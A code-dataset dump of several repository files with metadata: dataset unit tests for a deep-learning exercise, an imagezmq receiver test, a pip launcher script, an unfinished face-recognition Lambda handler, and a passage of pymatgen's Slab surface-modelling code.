cad19e5fa77ba7ef46bd852d8a0971021c7824de
| 4,123
|
py
|
Python
|
exercise_03/exercise_code/tests/image_folder_dataset_tests.py
|
stanley-chang/I2DL
|
78740460e1f52ce7643358fc548281f1bbe73a42
|
[
"RSA-MD"
] | 1
|
2021-03-14T20:39:06.000Z
|
2021-03-14T20:39:06.000Z
|
exercise2/exercise_04/exercise_code/tests/image_folder_dataset_tests.py
|
UtkarshTrehan-icloud/I2DL-TUM
|
7624ce84eebfd125f7c08bcb0b87cf25ba2e984c
|
[
"MIT"
] | null | null | null |
exercise2/exercise_04/exercise_code/tests/image_folder_dataset_tests.py
|
UtkarshTrehan-icloud/I2DL-TUM
|
7624ce84eebfd125f7c08bcb0b87cf25ba2e984c
|
[
"MIT"
] | null | null | null |
"""Tests for ImageFolderDataset in data/image_folder_dataset.py"""
import random
from .base_tests import UnitTest, MethodTest, ClassTest, test_results_to_score
from .len_tests import LenTest
class MakeDatasetTestImageType(UnitTest):
"""Test whether make_dataset() loads paths only and not actual images"""
def __init__(self, dataset):
self.dataset = dataset
self.image_type = str
self.wrong_image_type = None
def test(self):
images, _ = self.dataset.make_dataset(
directory=self.dataset.root_path,
class_to_idx=self.dataset.class_to_idx,
)
assert len(images) > 100
random_indices = random.sample(range(len(images)), 100)
for i in random_indices:
if not isinstance(images[i], self.image_type):
self.wrong_image_type = type(images[i])
return False
return True
def define_failure_message(self):
return "Expected images to contain file paths only, but got type %s" \
% self.wrong_image_type
class MakeDatasetTest(MethodTest):
"""Test make_dataset() method of ImageFolderDataset"""
def define_tests(self, dataset):
return [
MakeDatasetTestImageType(dataset),
]
def define_method_name(self):
return "make_dataset"
class GetItemTestType(UnitTest):
"""Test whether __getitem()__ returns correct data type"""
def __init__(self, dataset):
self.dataset = dataset
self.type = dict
self.wrong_type = None
def test(self):
random_indices = random.sample(range(len(self.dataset)), 100)
for i in random_indices:
if not isinstance(self.dataset[i], self.type):
self.wrong_type = type(self.dataset[i])
return False
return True
def define_failure_message(self):
return "Expected __getitem()__ to return type %s but got %s." \
% (self.type, self.wrong_type)
class GetItemTestImageShape(UnitTest):
"""Test whether images loaded by __getitem__() are of correct shape"""
def __init__(self, dataset):
self.dataset = dataset
self.expected_shape = (32, 32, 3)
self.wrong_shape = None
def test(self):
random_indices = random.sample(range(len(self.dataset)), 100)
for i in random_indices:
if self.dataset[i]["image"].shape != self.expected_shape:
self.wrong_shape = self.dataset[i]["image"].shape
return False
return True
def define_failure_message(self):
return "Expected images to have shape %s but got %s." \
% (str(self.expected_shape), str(self.dataset.images.shape))
class GetItemTestOrder(UnitTest):
"""Test whether order of items is correct"""
def __init__(self, dataset):
self.dataset = dataset
self.test_indices = [1, 3, 42, 100, 333, 999, 4242, 9999, 33333, -1]
self.expected_labels = [0, 0, 0, 0, 0, 0, 0, 2, 6, 9]
def test(self):
labels = [self.dataset[index]["label"] for index in self.test_indices]
return labels == self.expected_labels
def define_failure_message(self):
return "Order of items loaded by __getitem()__ not correct."
class GetItemTest(MethodTest):
"""Test __getitem__() method of ImageFolderDataset"""
def define_tests(self, dataset):
return [
GetItemTestType(dataset),
GetItemTestOrder(dataset),
GetItemTestImageShape(dataset),
]
def define_method_name(self):
return "__getitem__"
class ImageFolderDatasetTest(ClassTest):
"""Test class ImageFolderDataset"""
def define_tests(self, dataset):
return [
MakeDatasetTest(dataset),
LenTest(dataset, 50000),
GetItemTest(dataset),
]
def define_class_name(self):
return "ImageFolderDataset"
def test_image_folder_dataset(dataset):
"""Test class ImageFolderDataset"""
test = ImageFolderDatasetTest(dataset)
return test_results_to_score(test())
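# Usage sketch (illustrative; the import path and constructor argument are
# assumptions based on the module docstring above):
#   from exercise_code.data.image_folder_dataset import ImageFolderDataset
#   dataset = ImageFolderDataset(root=...)  # CIFAR-10-style folder with 50000 images
#   test_image_folder_dataset(dataset)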
| 31.715385
| 78
| 0.639825
|
344e6a5a48c0fd5dbe673b747ae8946b9353a6f0
| 1,442
|
py
|
Python
|
tests/test_1_sub.py
|
timsears/imagezmq
|
258453be9d86d213b31d83dcbcfcc68f26198328
|
[
"MIT"
] | null | null | null |
tests/test_1_sub.py
|
timsears/imagezmq
|
258453be9d86d213b31d83dcbcfcc68f26198328
|
[
"MIT"
] | null | null | null |
tests/test_1_sub.py
|
timsears/imagezmq
|
258453be9d86d213b31d83dcbcfcc68f26198328
|
[
"MIT"
] | null | null | null |
"""test_1_sub.py -- basic receive images test in PUB/SUB mode.
A simple test program that uses imagezmq to receive images from a program that
is sending images. This test pair uses the PUB/SUB messaging pattern.
1. Run this program in its own terminal window:
python test_1_sub.py
There is no particular order in which sending and receiving scripts should be
run.
2.Run the image sending program in a different terminal window:
python test_1_pub.py
A cv2.imshow() window will appear showing the transmitted image. The sending
program sends images with an incrementing counter so you can see what is sent
and what is received.
If you terminate the receiving script, note that the sending script will
continue to increment and send images.
If you start the receiving script again, it will pick up images from the
current position.
To end the programs, press Ctrl-C in the terminal window of the sending program
first. Then press Ctrl-C in the terminal window of the receiving program. You
may have to press Ctrl-C in the display window as well.
"""
import sys
import cv2
sys.path.insert(0, '../imagezmq') # imagezmq.py is in ../imagezmq
import imagezmq
image_hub = imagezmq.ImageHub(open_port='tcp://127.0.0.1:5555', REQ_REP=False)
while True: # press Ctrl-C to stop image display program
image_name, image = image_hub.recv_image()
cv2.imshow(image_name, image)
cv2.waitKey(1) # wait until a key is pressed
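# Sketch of the matching sender side (see test_1_pub.py; the exact address and
# keyword values here are assumptions consistent with the receiver above):
#   sender = imagezmq.ImageSender(connect_to='tcp://*:5555', REQ_REP=False)
#   while True:
#       sender.send_image('image name', image)  # image: any OpenCV/NumPy array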
| 36.05
| 79
| 0.776699
|
decc9935e8e0db90ac5c20492c331e59de8e29c4
| 401
|
py
|
Python
|
venv/Scripts/pip3.6-script.py
|
olderlong/DataTransport
|
583b6693e209258051b69029ba6e622daecdaf72
|
[
"Apache-2.0"
] | null | null | null |
venv/Scripts/pip3.6-script.py
|
olderlong/DataTransport
|
583b6693e209258051b69029ba6e622daecdaf72
|
[
"Apache-2.0"
] | null | null | null |
venv/Scripts/pip3.6-script.py
|
olderlong/DataTransport
|
583b6693e209258051b69029ba6e622daecdaf72
|
[
"Apache-2.0"
] | null | null | null |
#!E:\py_works\DataTransport\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==9.0.3','console_scripts','pip3.6'
__requires__ = 'pip==9.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==9.0.3', 'console_scripts', 'pip3.6')()
)
| 30.846154
| 69
| 0.660848
|
44e44f9e6fc124391554c71d01e0e60376494db2
| 2,269
|
py
|
Python
|
backend/smartguard/recognize_faces.py
|
edibusl/smart_guard
|
f2f86310ebc745bc81060a43a3e4eeecf1a7f158
|
[
"MIT"
] | null | null | null |
backend/smartguard/recognize_faces.py
|
edibusl/smart_guard
|
f2f86310ebc745bc81060a43a3e4eeecf1a7f158
|
[
"MIT"
] | null | null | null |
backend/smartguard/recognize_faces.py
|
edibusl/smart_guard
|
f2f86310ebc745bc81060a43a3e4eeecf1a7f158
|
[
"MIT"
] | null | null | null |
try:
import unzip_requirements
except ImportError:
pass
import json
import pickle

import cv2
import numpy as np
import sklearn  # required so the pickled scikit-learn recognizer can be unpickled
def handler(event, context):
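    # NOTE: as committed, this handler is incomplete -- `args`, `detections`,
    # `image`, `embedder`, `w`, `h`, and `body` are used below but never defined
    # here; they would need to come from the Lambda event payload and from
    # loading the face detector/embedder models.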
# load the actual face recognition model along with the label encoder
recognizer = pickle.loads(open(args["recognizer"], "rb").read())
le = pickle.loads(open(args["le"], "rb").read())
# loop over the detections
for i in range(0, detections.shape[2]):
# extract the confidence (i.e., probability) associated with the
# prediction
confidence = detections[0, 0, i, 2]
# filter out weak detections
if confidence > args["confidence"]:
# compute the (x, y)-coordinates of the bounding box for the
# face
box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])
(startX, startY, endX, endY) = box.astype("int")
# extract the face ROI
face = image[startY:endY, startX:endX]
(fH, fW) = face.shape[:2]
# ensure the face width and height are sufficiently large
if fW < 20 or fH < 20:
continue
# construct a blob for the face ROI, then pass the blob
# through our face embedding model to obtain the 128-d
# quantification of the face
faceBlob = cv2.dnn.blobFromImage(face, 1.0 / 255, (96, 96), (0, 0, 0), swapRB=True, crop=False)
embedder.setInput(faceBlob)
vec = embedder.forward()
# perform classification to recognize the face
preds = recognizer.predict_proba(vec)[0]
j = np.argmax(preds)
proba = preds[j]
name = le.classes_[j]
# draw the bounding box of the face along with the associated
# probability
text = "{}: {:.2f}%".format(name, proba * 100)
y = startY - 10 if startY - 10 > 10 else startY + 10
cv2.rectangle(image, (startX, startY), (endX, endY), (0, 0, 255), 2)
cv2.putText(image, text, (startX, y), cv2.FONT_HERSHEY_SIMPLEX, 0.45, (0, 0, 255), 2)
# show the output image
cv2.imshow("Image", image)
cv2.waitKey(0)
response = {
"statusCode": 200,
"body": json.dumps(body)
}
return response
| 33.367647
| 107
| 0.57338
|
1a8123c1be82576969e163a0a2f3a97eaab26437
| 85,633
|
py
|
Python
|
pymatgen/core/surface.py
|
JRSuckert/pymatgen
|
f3f54792219035604f39e8ecbc544a410f4b7c97
|
[
"MIT"
] | 2
|
2019-03-14T17:58:33.000Z
|
2021-01-26T13:17:59.000Z
|
pymatgen/core/surface.py
|
darnoceloc/pymatgen
|
5cc42912a12a265a603df7e34c856561f76edc1f
|
[
"MIT"
] | null | null | null |
pymatgen/core/surface.py
|
darnoceloc/pymatgen
|
5cc42912a12a265a603df7e34c856561f76edc1f
|
[
"MIT"
] | 1
|
2015-10-12T20:03:27.000Z
|
2015-10-12T20:03:27.000Z
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from functools import reduce
from math import gcd
import math
import itertools
import logging
import warnings
import copy
import os
import json
import numpy as np
from scipy.spatial.distance import squareform
from scipy.cluster.hierarchy import linkage, fcluster
from monty.fractions import lcm
from pymatgen.core.periodic_table import get_el_sp
from pymatgen.core.structure import Structure
from pymatgen.core.lattice import Lattice
from pymatgen.core.sites import PeriodicSite
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
from pymatgen.util.coord import in_coord_list
from pymatgen.analysis.structure_matcher import StructureMatcher
"""
This module implements representations of slabs and surfaces, as well as
algorithms for generating them. If you use this module, please consider
citing the following work::
R. Tran, Z. Xu, B. Radhakrishnan, D. Winston, W. Sun, K. A. Persson,
S. P. Ong, "Surface Energies of Elemental Crystals", Scientific Data,
2016, 3:160080, doi: 10.1038/sdata.2016.80.
as well as::
Sun, W.; Ceder, G. Efficient creation and convergence of surface slabs,
Surface Science, 2013, 617, 53–59, doi:10.1016/j.susc.2013.05.016.
"""
__author__ = "Richard Tran, Wenhao Sun, Zihan Xu, Shyue Ping Ong"
__copyright__ = "Copyright 2014, The Materials Virtual Lab"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "ongsp@ucsd.edu"
__date__ = "6/10/14"
logger = logging.getLogger(__name__)
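# Typical high-level usage (sketch only; SlabGenerator is defined further below
# in this module):
#   gen = SlabGenerator(initial_structure, miller_index=(1, 1, 1),
#                       min_slab_size=10, min_vacuum_size=10)
#   slabs = gen.get_slabs()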
class Slab(Structure):
"""
Subclass of Structure representing a Slab. Implements additional
attributes pertaining to slabs, but the init method does not
actually implement any algorithm that creates a slab. This is a
DUMMY class whose init method only holds information about the
slab. Also has additional methods that returns other information
about a slab such as the surface area, normal, and atom adsorption.
Note that all Slabs have the surface normal oriented perpendicular to the a
and b lattice vectors. This means the lattice vectors a and b are in the
surface plane and the c vector is out of the surface plane (though not
necessarily perpendicular to the surface).
.. attribute:: miller_index
Miller index of plane parallel to surface.
.. attribute:: scale_factor
Final computed scale factor that brings the parent cell to the
surface cell.
.. attribute:: shift
The shift value in Angstrom that indicates how much this
slab has been shifted.
"""
def __init__(self, lattice, species, coords, miller_index,
oriented_unit_cell, shift, scale_factor, reorient_lattice=True,
validate_proximity=False, to_unit_cell=False,
reconstruction=None, coords_are_cartesian=False,
site_properties=None, energy=None):
"""
Makes a Slab structure, a structure object with additional information
and methods pertaining to slabs.
Args:
lattice (Lattice/3x3 array): The lattice, either as a
:class:`pymatgen.core.lattice.Lattice` or
simply as any 2D array. Each row should correspond to a lattice
vector. E.g., [[10,0,0], [20,10,0], [0,0,30]] specifies a
lattice with lattice vectors [10,0,0], [20,10,0] and [0,0,30].
species ([Specie]): Sequence of species on each site. Can take in
flexible input, including:
i. A sequence of element / specie specified either as string
symbols, e.g. ["Li", "Fe2+", "P", ...] or atomic numbers,
e.g., (3, 56, ...) or actual Element or Specie objects.
ii. List of dict of elements/species and occupancies, e.g.,
[{"Fe" : 0.5, "Mn":0.5}, ...]. This allows the setup of
disordered structures.
coords (Nx3 array): list of fractional/cartesian coordinates of
each species.
miller_index ([h, k, l]): Miller index of plane parallel to
surface. Note that this is referenced to the input structure. If
you need this to be based on the conventional cell,
you should supply the conventional structure.
oriented_unit_cell (Structure): The oriented_unit_cell from which
this Slab is created (by scaling in the c-direction).
shift (float): The shift in the c-direction applied to get the
termination.
scale_factor (array): scale_factor Final computed scale factor
that brings the parent cell to the surface cell.
reorient_lattice (bool): reorients the lattice parameters such that
the c direction is the third vector of the lattice matrix
validate_proximity (bool): Whether to check if there are sites
that are less than 0.01 Ang apart. Defaults to False.
reconstruction (str): Type of reconstruction. Defaults to None if
the slab is not reconstructed.
coords_are_cartesian (bool): Set to True if you are providing
coordinates in cartesian coordinates. Defaults to False.
site_properties (dict): Properties associated with the sites as a
dict of sequences, e.g., {"magmom":[5,5,5,5]}. The sequences
have to be the same length as the atomic species and
fractional_coords. Defaults to None for no properties.
energy (float): A value for the energy.
"""
self.oriented_unit_cell = oriented_unit_cell
self.miller_index = tuple(miller_index)
self.shift = shift
self.reconstruction = reconstruction
self.scale_factor = scale_factor
self.energy = energy
self.reorient_lattice = reorient_lattice
lattice = Lattice.from_parameters(lattice.a, lattice.b, lattice.c,
lattice.alpha, lattice.beta,
lattice.gamma) \
if self.reorient_lattice else lattice
super().__init__(
lattice, species, coords, validate_proximity=validate_proximity,
to_unit_cell=to_unit_cell,
coords_are_cartesian=coords_are_cartesian,
site_properties=site_properties)
def get_orthogonal_c_slab(self):
"""
This method returns a Slab where the normal (c lattice vector) is
"forced" to be exactly orthogonal to the surface a and b lattice
vectors. **Note that this breaks inherent symmetries in the slab.**
It should be pointed out that orthogonality is not required to get good
surface energies, but it can be useful in cases where the slabs are
subsequently used for postprocessing of some kind, e.g. generating
GBs or interfaces.
"""
a, b, c = self.lattice.matrix
new_c = np.cross(a, b)
new_c /= np.linalg.norm(new_c)
new_c = np.dot(c, new_c) * new_c
new_latt = Lattice([a, b, new_c])
return Slab(lattice=new_latt, species=self.species_and_occu,
coords=self.cart_coords, miller_index=self.miller_index,
oriented_unit_cell=self.oriented_unit_cell,
shift=self.shift, scale_factor=self.scale_factor,
coords_are_cartesian=True, energy=self.energy,
reorient_lattice=self.reorient_lattice,
site_properties=self.site_properties)
def get_tasker2_slabs(self, tol=0.01, same_species_only=True):
"""
Get a list of slabs that have been Tasker 2 corrected.
Args:
tol (float): Tolerance to determine if atoms are within same plane.
This is a fractional tolerance, not an absolute one.
same_species_only (bool): If True, only sites that are of the exact same
species as the atom at the outermost surface are considered for
moving. Otherwise, all atoms within tol are considered for
moving, regardless of species. Default is True (usually
the desired behavior).
Returns:
([Slab]) List of Tasker 2 corrected slabs.
"""
sites = list(self.sites)
slabs = []
sortedcsites = sorted(sites, key=lambda site: site.c)
# Determine what fraction the slab is of the total cell size in the
# c direction. Round to nearest rational number.
nlayers_total = int(round(self.lattice.c /
self.oriented_unit_cell.lattice.c))
nlayers_slab = int(round((sortedcsites[-1].c - sortedcsites[0].c)
* nlayers_total))
slab_ratio = nlayers_slab / nlayers_total
a = SpacegroupAnalyzer(self)
symm_structure = a.get_symmetrized_structure()
def equi_index(site):
for i, equi_sites in enumerate(symm_structure.equivalent_sites):
if site in equi_sites:
return i
raise ValueError("Cannot determine equi index!")
for surface_site, shift in [(sortedcsites[0], slab_ratio),
(sortedcsites[-1], -slab_ratio)]:
tomove = []
fixed = []
for site in sites:
if abs(site.c - surface_site.c) < tol and (
(not same_species_only) or
site.species == surface_site.species):
tomove.append(site)
else:
fixed.append(site)
# Sort and group the sites by the species and symmetry equivalence
tomove = sorted(tomove, key=lambda s: equi_index(s))
grouped = [list(sites) for k, sites in itertools.groupby(
tomove, key=lambda s: equi_index(s))]
if len(tomove) == 0 or any([len(g) % 2 != 0 for g in grouped]):
warnings.warn("Odd number of sites to divide! Try changing "
"the tolerance to ensure even division of "
"sites or create supercells in a or b directions "
"to allow for atoms to be moved!")
continue
combinations = []
for g in grouped:
combinations.append(
[c for c in itertools.combinations(g, int(len(g) / 2))])
for selection in itertools.product(*combinations):
species = [site.species for site in fixed]
fcoords = [site.frac_coords for site in fixed]
for s in tomove:
species.append(s.species)
for group in selection:
if s in group:
fcoords.append(s.frac_coords)
break
else:
# Move unselected atom to the opposite surface.
fcoords.append(s.frac_coords + [0, 0, shift])
# sort by species to put all similar species together.
sp_fcoord = sorted(zip(species, fcoords), key=lambda x: x[0])
species = [x[0] for x in sp_fcoord]
fcoords = [x[1] for x in sp_fcoord]
slab = Slab(self.lattice, species, fcoords, self.miller_index,
self.oriented_unit_cell, self.shift,
self.scale_factor, energy=self.energy,
reorient_lattice=self.reorient_lattice)
slabs.append(slab)
s = StructureMatcher()
unique = [ss[0] for ss in s.group_structures(slabs)]
return unique
def is_symmetric(self, symprec=0.1):
"""
Checks if slab is symmetric, i.e., contains inversion symmetry.
Args:
symprec (float): Symmetry precision used for SpaceGroup analyzer.
Returns:
(bool) Whether slab contains inversion symmetry.
"""
sg = SpacegroupAnalyzer(self, symprec=symprec)
return sg.is_laue()
def get_sorted_structure(self, key=None, reverse=False):
"""
Get a sorted copy of the structure. The parameters have the same
meaning as in list.sort. By default, sites are sorted by the
electronegativity of the species. Note that Slab has to override this
because of the different __init__ args.
Args:
key: Specifies a function of one argument that is used to extract
a comparison key from each list element: key=str.lower. The
default value is None (compare the elements directly).
reverse (bool): If set to True, then the list elements are sorted
as if each comparison were reversed.
"""
sites = sorted(self, key=key, reverse=reverse)
s = Structure.from_sites(sites)
return Slab(s.lattice, s.species_and_occu, s.frac_coords,
self.miller_index, self.oriented_unit_cell, self.shift,
self.scale_factor, site_properties=s.site_properties,
reorient_lattice=self.reorient_lattice)
def copy(self, site_properties=None, sanitize=False):
"""
Convenience method to get a copy of the structure, with options to add
site properties.
Args:
site_properties (dict): Properties to add or override. The
properties are specified in the same way as the constructor,
i.e., as a dict of the form {property: [values]}. The
properties should be in the order of the *original* structure
if you are performing sanitization.
sanitize (bool): If True, this method will return a sanitized
structure. Sanitization performs a few things: (i) The sites are
sorted by electronegativity, (ii) a LLL lattice reduction is
carried out to obtain a relatively orthogonalized cell,
(iii) all fractional coords for sites are mapped into the
unit cell.
Returns:
A copy of the Structure, with optionally new site_properties and
optionally sanitized.
"""
props = self.site_properties
if site_properties:
props.update(site_properties)
return Slab(self.lattice, self.species_and_occu, self.frac_coords,
self.miller_index, self.oriented_unit_cell, self.shift,
self.scale_factor, site_properties=props,
reorient_lattice=self.reorient_lattice)
@property
def dipole(self):
"""
Calculates the dipole of the Slab in the direction of the surface
normal. Note that the Slab must be oxidation state-decorated for this
to work properly. Otherwise, the Slab will always have a dipole of 0.
"""
dipole = np.zeros(3)
mid_pt = np.sum(self.cart_coords, axis=0) / len(self)
normal = self.normal
for site in self:
charge = sum([getattr(sp, "oxi_state", 0) * amt
for sp, amt in site.species.items()])
dipole += charge * np.dot(site.coords - mid_pt, normal) * normal
return dipole
def is_polar(self, tol_dipole_per_unit_area=1e-3):
"""
Checks whether the surface is polar by computing the dipole per unit
area. Note that the Slab must be oxidation state-decorated for this
to work properly. Otherwise, the Slab will always be non-polar.
Args:
tol_dipole_per_unit_area (float): A tolerance. If the dipole
magnitude per unit area is less than this value, the Slab is
considered non-polar. Defaults to 1e-3, which is usually
pretty good. Normalized dipole per unit area is used as it is
more reliable than using the total, which tends to be larger for
slabs with larger surface areas.
"""
dip_per_unit_area = self.dipole / self.surface_area
return np.linalg.norm(dip_per_unit_area) > tol_dipole_per_unit_area
@property
def normal(self):
"""
Calculates the surface normal vector of the slab
"""
normal = np.cross(self.lattice.matrix[0], self.lattice.matrix[1])
normal /= np.linalg.norm(normal)
return normal
@property
def surface_area(self):
"""
Calculates the surface area of the slab
"""
m = self.lattice.matrix
return np.linalg.norm(np.cross(m[0], m[1]))
@property
def center_of_mass(self):
"""
Calculates the center of mass of the slab
"""
weights = [s.species.weight for s in self]
center_of_mass = np.average(self.frac_coords,
weights=weights, axis=0)
return center_of_mass
def add_adsorbate_atom(self, indices, specie, distance):
"""
Adds a single adsorbate atom to the slab structure
(a slab from the Slab class, oriented in [0, 0, 1]).
Args:
indices ([int]): Indices of sites on which to put the adsorbate.
The adsorbed atom will be displaced relative to the center of
these sites.
specie (Specie/Element/str): adsorbed atom species
distance (float): between centers of the adsorbed atom and the
given site in Angstroms.
"""
# Let's do the work in cartesian coords
center = np.sum([self[i].coords for i in indices], axis=0) / len(
indices)
coords = center + self.normal * distance / np.linalg.norm(self.normal)
self.append(specie, coords, coords_are_cartesian=True)
def __str__(self):
comp = self.composition
outs = [
"Slab Summary (%s)" % comp.formula,
"Reduced Formula: %s" % comp.reduced_formula,
"Miller index: %s" % (self.miller_index, ),
"Shift: %.4f, Scale Factor: %s" % (self.shift,
self.scale_factor.__str__())]
to_s = lambda x: "%0.6f" % x
outs.append("abc : " + " ".join([to_s(i).rjust(10)
for i in self.lattice.abc]))
outs.append("angles: " + " ".join([to_s(i).rjust(10)
for i in self.lattice.angles]))
outs.append("Sites ({i})".format(i=len(self)))
for i, site in enumerate(self):
outs.append(" ".join([str(i + 1), site.species_string,
" ".join([to_s(j).rjust(12)
for j in site.frac_coords])]))
return "\n".join(outs)
def as_dict(self):
d = super().as_dict()
d["@module"] = self.__class__.__module__
d["@class"] = self.__class__.__name__
d["oriented_unit_cell"] = self.oriented_unit_cell.as_dict()
d["miller_index"] = self.miller_index
d["shift"] = self.shift
d["scale_factor"] = self.scale_factor
d["reconstruction"] = self.reconstruction
d["energy"] = self.energy
return d
@classmethod
def from_dict(cls, d):
lattice = Lattice.from_dict(d["lattice"])
sites = [PeriodicSite.from_dict(sd, lattice) for sd in d["sites"]]
s = Structure.from_sites(sites)
return Slab(
lattice=lattice,
species=s.species_and_occu, coords=s.frac_coords,
miller_index=d["miller_index"],
oriented_unit_cell=Structure.from_dict(d["oriented_unit_cell"]),
shift=d["shift"], scale_factor=d["scale_factor"],
site_properties=s.site_properties, energy=d["energy"]
)
def get_surface_sites(self, tag=False):
"""
Returns the surface sites and their indices in a dictionary. The
oriented unit cell of the slab will determine the coordination number
of a typical site. We use VoronoiNN to determine the
coordination number of bulk sites and slab sites. Due to the
pathological error resulting from some surface sites in the
VoronoiNN, we assume any site that has this error is a surface
site as well. This will work for elemental systems only for now. Useful
for analysis involving broken bonds and for finding adsorption sites.
Args:
tag (bool): Option to add the site attribute "is_surf_site" (bool)
to all sites of the slab. Defaults to False.
Returns:
A dictionary grouping sites on top and bottom of the slab
together.
{"top": [sites with indices], "bottom": [sites with indices}
TODO:
Is there a way to determine site equivalence between sites in a slab
and bulk system? This would allow us to get the coordination number of
a specific site for multi-elemental systems or systems with more
than one inequivalent site, which would let us use this method for
compound systems.
"""
from pymatgen.analysis.local_env import VoronoiNN
# Get a dictionary of coordination numbers
# for each distinct site in the structure
a = SpacegroupAnalyzer(self.oriented_unit_cell)
ucell = a.get_symmetrized_structure()
cn_dict = {}
v = VoronoiNN()
unique_indices = [equ[0] for equ in ucell.equivalent_indices]
for i in unique_indices:
el = ucell[i].species_string
if el not in cn_dict.keys():
cn_dict[el] = []
# Since this will get the cn as a result of the weighted polyhedra, the
# slightest difference in cn will indicate a different environment for a
# species, e.g. bond distance of each neighbor or neighbor species. Round
# the cn to a fixed number of decimal places so that effectively
# identical coordination numbers compare as equal.
cn = v.get_cn(ucell, i, use_weights=True)
cn = float('%.5f' %(round(cn, 5)))
if cn not in cn_dict[el]:
cn_dict[el].append(cn)
v = VoronoiNN()
surf_sites_dict, properties = {"top": [], "bottom": []}, []
for i, site in enumerate(self):
# Determine if site is closer to the top or bottom of the slab
top = True if site.frac_coords[2] > self.center_of_mass[2] else False
try:
# A site is a surface site, if its environment does
# not fit the environment of other sites
cn = float('%.5f' %(round(v.get_cn(self, i, use_weights=True), 5)))
if cn < min(cn_dict[site.species_string]):
properties.append(True)
key = "top" if top else "bottom"
surf_sites_dict[key].append([site, i])
else:
properties.append(False)
except RuntimeError:
# or if pathological error is returned, indicating a surface site
properties.append(True)
key = "top" if top else "bottom"
surf_sites_dict[key].append([site, i])
if tag:
self.add_site_property("is_surf_site", properties)
return surf_sites_dict
def have_equivalent_surfaces(self):
"""
Check if we have same number of equivalent sites on both surfaces.
This is an alternative to checking Laue symmetry (is_symmetric())
if we want to ensure both surfaces in the slab are the same
"""
# tag the sites as either surface sites or not
surf_sites_dict = self.get_surface_sites(tag=True)
a = SpacegroupAnalyzer(self)
symm_structure = a.get_symmetrized_structure()
# ensure each site on one surface has a
# corresponding equivalent site on the other
equal_surf_sites = []
for equ in symm_structure.equivalent_sites:
# Top and bottom are arbitrary, we will just determine
# if one site is on one side of the slab or the other
top, bottom = 0, 0
for s in equ:
if s.is_surf_site:
if s.frac_coords[2] > self.center_of_mass[2]:
top += 1
else:
bottom += 1
# Check to see if the number of equivalent sites
# on one side of the slab are equal to the other
equal_surf_sites.append(top == bottom)
return all(equal_surf_sites)
def get_symmetric_site(self, point, cartesian=False):
"""
This method uses symmetry operations to find equivalent sites on
both sides of the slab. Works mainly for slabs with Laue
symmetry. This is useful for retaining the non-polar and
symmetric properties of a slab when creating adsorbed
structures or symmetric reconstructions.
Args:
point: Fractional coordinate (or cartesian coordinate if
cartesian=True) of a site in the slab.
cartesian (bool): Whether the given point is in cartesian coordinates.
Returns:
point: A coordinate equivalent to the input point, but on the
other side of the slab
"""
sg = SpacegroupAnalyzer(self)
ops = sg.get_symmetry_operations(cartesian=cartesian)
# Each operation on a point will return an equivalent point.
# We want to find the point on the other side of the slab.
for op in ops:
slab = self.copy()
site2 = op.operate(point)
if "%.6f" % (site2[2]) == "%.6f" % (point[2]):
continue
# Add dummy site to check the overall structure is symmetric
slab.append("O", point, coords_are_cartesian=cartesian)
slab.append("O", site2, coords_are_cartesian=cartesian)
sg = SpacegroupAnalyzer(slab)
if sg.is_laue():
break
else:
# If not symmetric, remove the two added
# sites and try another symmetry operator
slab.remove_sites([len(slab) - 1])
slab.remove_sites([len(slab) - 1])
return site2
def symmetrically_add_atom(self, specie, point, coords_are_cartesian=False):
"""
Method for adding a site at a specified point in a slab.
Will add the corresponding site on the other side of the
slab to maintain equivalent surfaces.
Arg:
specie (str): The specie to add
point (coords): The coordinate of the site in the slab to add.
coords_are_cartesian (bool): Is the point in cartesian coordinates
Returns:
(Slab): The modified slab
"""
# Get the symmetrically equivalent point on the other side of the slab
point2 = self.get_symmetric_site(point, cartesian=coords_are_cartesian)
self.append(specie, point, coords_are_cartesian=coords_are_cartesian)
self.append(specie, point2, coords_are_cartesian=coords_are_cartesian)
def symmetrically_remove_atoms(self, indices):
"""
Method for removing sites corresponding to a list of indices.
Will remove the corresponding site on the other side of the
slab to maintain equivalent surfaces.
Arg:
indices ([indices]): The indices of the sites
in the slab to remove.
"""
slabcopy = SpacegroupAnalyzer(self.copy()).get_symmetrized_structure()
points = [slabcopy[i].frac_coords for i in indices]
removal_list = []
for pt in points:
# Get the index of the original site on top
cart_point = slabcopy.lattice.get_cartesian_coords(pt)
dist = [site.distance_from_point(cart_point) for site in slabcopy]
site1 = dist.index(min(dist))
# Get the index of the corresponding site at the bottom
for i, eq_sites in enumerate(slabcopy.equivalent_sites):
if slabcopy[site1] in eq_sites:
eq_indices = slabcopy.equivalent_indices[i]
break
i1 = eq_indices[eq_sites.index(slabcopy[site1])]
for i2 in eq_indices:
if i2 == i1:
continue
if slabcopy[i2].frac_coords[2] == slabcopy[i1].frac_coords[2]:
continue
# Test site remove to see if it results in symmetric slab
s = self.copy()
s.remove_sites([i1, i2])
if s.is_symmetric():
removal_list.extend([i1, i2])
break
# If expected, 2 atoms are removed per index
if len(removal_list) == 2*len(indices):
self.remove_sites(removal_list)
else:
warnings.warn("Equivalent sites could not be found for removal for all indices. Surface unchanged.")
class SlabGenerator:
"""
This class generates different slabs using shift values determined by where
a unique termination can be found, along with other criteria such as where a
termination doesn't break a polyhedral bond. The shift value then indicates
where the slab layer will begin and terminate in the slab-vacuum system.
.. attribute:: oriented_unit_cell
A unit cell of the parent structure with the miller
index of plane parallel to surface
.. attribute:: parent
Parent structure from which Slab was derived.
.. attribute:: lll_reduce
Whether or not the slabs will be orthogonalized
.. attribute:: center_slab
Whether or not the slabs will be centered between
the vacuum layer
.. attribute:: slab_scale_factor
Final computed scale factor that brings the parent cell to the
surface cell.
.. attribute:: miller_index
Miller index of plane parallel to surface.
.. attribute:: min_slab_size
Minimum size in angstroms of layers containing atoms
.. attribute:: min_vac_size
Minimum size in angstroms of layers containing vacuum
"""
def __init__(self, initial_structure, miller_index, min_slab_size,
min_vacuum_size, lll_reduce=False, center_slab=False,
in_unit_planes=False, primitive=True, max_normal_search=None,
reorient_lattice=True):
"""
Calculates the slab scale factor and uses it to generate a unit cell
of the initial structure that has been oriented by its miller index.
